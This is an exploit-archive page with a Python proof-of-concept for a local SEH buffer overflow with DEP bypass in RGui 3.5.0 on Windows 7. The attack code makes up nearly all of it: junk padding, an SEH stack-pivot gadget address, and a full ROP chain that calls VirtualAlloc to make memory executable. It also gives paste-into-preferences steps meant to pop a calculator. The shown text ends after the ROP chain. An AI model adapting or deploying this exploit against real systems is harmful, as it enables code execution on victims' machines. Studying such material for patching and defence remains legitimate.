Rgui 3.5.0 local buffer overflow (seh)(dep bypass) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-01-10 |
Type : local |
Platform : windows
This exploit / vulnerability Rgui 3.5.0 local buffer overflow (seh)(dep bypass) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-09-2018
# Vulnerable Software: RGui 3.5.0
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Tested On: Windows 7 x86
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
# this was fixed in 3.5.1;
#
# PoC:
# 1. generate rgui350dep.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste rgui350dep.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
import struct
filename="rgui350dep.txt"
junk = "A"*904
#{pivot 2556 / 0x9fc}
# ADD ESP,9EC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Rgraphapp.dll]
seh = struct.pack('<L',0x637561a2)
#adjust
nops = "\x90"*40
#ROP Chain for VirtualAlloc()
#!mona rop -cpb "\x00\x0a\x0d\x0e"
#rop chain generated with mona.py - www.corelan.be
def create_rop_chain():
rop_gadgets = [
0x6c931aaa, # POP EAX # RETN [R.dll]
0x6e759b5c, # ptr to &VirtualAlloc() [IAT R.dll]
0x6ff41ce5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
0x6c969986, # XCHG EAX,ESI # RETN [R.dll]
0x6c05596c, # POP EBP # RETN [Rlapack.dll]
0x6cb9bc4a, # & call esp [R.dll]
0x6c931b1a, # POP EAX # RETN [R.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x63742b7f, # NEG EAX # RETN [Rgraphapp.dll]
0x63747d47, # XCHG EAX,EBX # RETN [Rgraphapp.dll]
0x63977f84, # POP EAX # RETN [graphics.dll]
0xa4e74b7d, # put delta into eax (-> put 0x00001000 into edx)
0x6c92e13a, # ADD EAX,5B18C483 # RETN [R.dll]
0x6c9f4bca, # XCHG EAX,EDX # RETN [R.dll]
0x713811b8, # POP ECX # RETN [stats.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7136d670, # NEG ECX # RETN [stats.dll]
0x6cb2601a, # POP EDI # RETN [R.dll]
0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
0x63976123, # POP EAX # RETN [graphics.dll]
0x90909090, # nop
0x6ff24de3, # PUSHAD # RETN [grDevices.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)